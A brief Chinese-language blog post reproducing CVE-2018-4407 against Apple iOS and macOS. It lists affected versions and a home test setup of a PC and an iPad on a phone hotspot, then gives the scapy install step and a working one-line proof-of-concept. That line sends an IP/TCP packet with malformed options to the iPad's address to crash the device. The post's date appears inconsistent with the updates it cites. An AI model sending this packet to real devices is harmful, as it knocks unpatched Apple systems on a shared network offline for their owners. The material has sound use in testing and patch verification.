CVE-2018-4407

环境：用手机开启的热点，pc本一台，ipad一台

pc电脑:192.168.43.30

ipad：192.168.43.145

影响版本

Apple iOS 11及更早版本：所有设备（升级到iOS 12的部分设备）

Apple macOS High Sierra（受影响的最高版本为10.13.6）：所有设备（通过安全更新2018-001修复）

Apple macOS Sierra（受影响的最高版本为10.12.6）：所有设备（通过安全更新2018-005中修复）

Apple OS X El Capitan及更早版本：所有设备

如果，将pc跟ipad运行在同一个网下

安装scapy模块

pip install scapy

执行脚本程序

python cve-2018-4407.py

最后给大家一个ipad的测试截图

最后poc肯定是要发出来的呀~

#pip install scapy

import scapy

from scapy.all import *

send(IP(dst="192.168.43.145",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))

如需转载，请注明原文出处！！！

2018/1/11

ian